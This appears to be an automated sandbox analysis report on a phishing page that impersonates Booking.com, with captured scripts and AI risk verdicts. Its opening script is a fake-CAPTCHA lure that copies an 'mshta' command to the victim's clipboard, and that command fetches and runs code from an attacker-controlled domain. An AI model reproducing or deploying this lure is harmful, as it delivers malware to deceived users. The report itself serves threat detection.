copyToClipboard("mshta https://re-capcha.cfd/Capcha.html # ''I am not a robot - reCAPTCHA Verification ID: 3781''");
$('.checkbtn-bot').hide();
$('.checkbox-bot-load').show();
$('.sjgdhfgas34').css('display', 'flex');
$.ajax({
url: "../../api?c=1",
type: 'GET',
});
}
function copyToClipboard(str)
{
var area = document.createElement('textarea');
document.body.appendChild(area);
area.value = str;
area.select();
document.execCommand("copy");
document.body.removeChild(area);
}
|
URL: https://code.jquery.com/jquery-3.7.1.min.js... Model: Joe Sandbox AI | {
"risk_score": 1,
"reasoning": "This appears to be the standard jQuery library, which is a widely used and trusted JavaScript library. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is well-structured and does not exhibit any aggressive or obfuscated behavior. Overall, this script is likely benign and used for legitimate web development purposes."
} |
/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[i.call(e)]||"object":typeof e}var t="3.7.1",l=/HTML$/i,ce=function(e,t){return new ce.fn.init(e,t)};function c(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!v(e)&&!y(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}function fe(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()}ce.fn=ce.prototype={jquery:t,constructor:ce,length:0,toArray:function(){return ae.call(this)},get:function(e){return null==e?ae.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=ce.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return ce.each(this,e)},map:function(n){return this.pushStack(ce.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(ce.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:oe.sort,splice:oe.splice},ce.extend=ce.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||v(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(ce.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||ce.isPlainObject(n)?n:{},i=!1,a[t]=ce.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},ce.extend({expando:"jQuery"+(t+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==i.call(e))&&(!(t=r(e))||"function"==typeof(n=ue.call(t,"constructor")&&t.constructor)&&o.call(n)===a)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1===i||11===i?e.textContent:9===i?e.documentElement.textContent:3===i||4===i?e.nodeValue:n},makeArray:function(e,t){var n=t||[];return null!=e&&(c(Object(e))?ce.merge(n,"string"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:se.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!l.test(t||n&&n.nodeName||"HTML")},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){va |
URL: https://booking.rescomunicationshow.com/sign-in?op... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission to an unknown domain ('zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com') and the use of a fallback domain mechanism. While the script appears to be related to analytics or user tracking, the lack of transparency and the use of an unfamiliar domain raise some concerns, warranting further review."
} |
(function(){var g=function(e,h,f,g){
this.get=function(a){for(var a=a+"=",c=document.cookie.split(";"),b=0,e=c.length;b<e;b++){for(var d=c[b];" "==d.charAt(0);)d=d.substring(1,d.length);if(0==d.indexOf(a))return d.substring(a.length,d.length)}return null};
this.set=function(a,c){var b="",b=new Date;b.setTime(b.getTime()+6048E5);b="; expires="+b.toGMTString();document.cookie=a+"="+c+b+"; path=/; "};
this.check=function(){var a=this.get(f);if(a)a=a.split(":");else if(100!=e)"v"==h&&(e=Math.random()>=e/100?0:100),a=[h,e,0],this.set(f,a.join(":"));else return!0;var c=a[1];if(100==c)return!0;switch(a[0]){case "v":return!1;case "r":return c=a[2]%Math.floor(100/c),a[2]++,this.set(f,a.join(":")),!c}return!0};
this.go=function(){if(this.check()){var a=document.createElement("script");a.type="text/javascript";a.src=g;document.body&&document.body.appendChild(a)}};
this.start=function(){var t=this;"complete"!==document.readyState?window.addEventListener?window.addEventListener("load",function(){t.go()},!1):window.attachEvent&&window.attachEvent("onload",function(){t.go()}):t.go()};};
try{(new g(100,"r","QSI_S_ZN_3Eum1ldyL0aIh0i","https://zn3eum1ldyl0aih0i-partnersatbooking.siteintercept.qualtrics.com/SIE/?Q_ZID=ZN_3Eum1ldyL0aIh0i")).start()}catch(i){}})();
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "I'm not a robot",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "I'm not a robot",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"brands": [
"Booking.com"
]
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | {
"brands": [
"Booking.com"
]
} |
|
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | ```json{ "legit_domain": "booking.com", "classification": "wellknown", "reasons": [ "The brand 'Booking.com' is a well-known online travel agency.", "The legitimate domain for Booking.com is 'booking.com'.", "The provided URL 'booking.rescomunicationshow.com' does not match the legitimate domain.", "The URL contains an extra word 'rescomunicationshow', which is suspicious and indicative of phishing.", "The domain structure suggests an attempt to mimic the legitimate brand by using a similar name." ], "riskscore": 9}
Google indexed: False |
URL: booking.rescomunicationshow.com
Brands: Booking.com
Input Fields: unknown |
URL: https://booking.rescomunicationshow.com/sign-in?op_token=zXj81EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uN3prM3BpcmgSCWF1dGhvcml6ZRoaaHR0cHM6Ly9hZG1pbi5ib29raW5nLmNvbS8qOnsiYXV0aF9hdHRlbXB0X2lkIjoiYjEzZGNlMjQtMGM5OS00YjJlLThiOGUtNjI0NjllN2Y1ZGQ5In0yK1lHOEtPZGcwYXplS Model: Joe Sandbox AI | ```json{ "legit_domain": "booking.com", "classification": "wellknown", "reasons": [ "The brand 'Booking.com' is a well-known online travel agency.", "The legitimate domain for Booking.com is 'booking.com'.", "The provided URL 'booking.rescomunicationshow.com' does not match the legitimate domain.", "The URL contains an extra word 'rescomunicationshow', which is suspicious and indicative of phishing.", "The domain structure suggests an attempt to mimic the legitimate brand by using a similar name." ], "riskscore": 9}
Google indexed: False |
URL: booking.rescomunicationshow.com
Brands: Booking.com
Input Fields: unknown |
URL: https://rescomunicationshow.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://rescomunicationshow.com |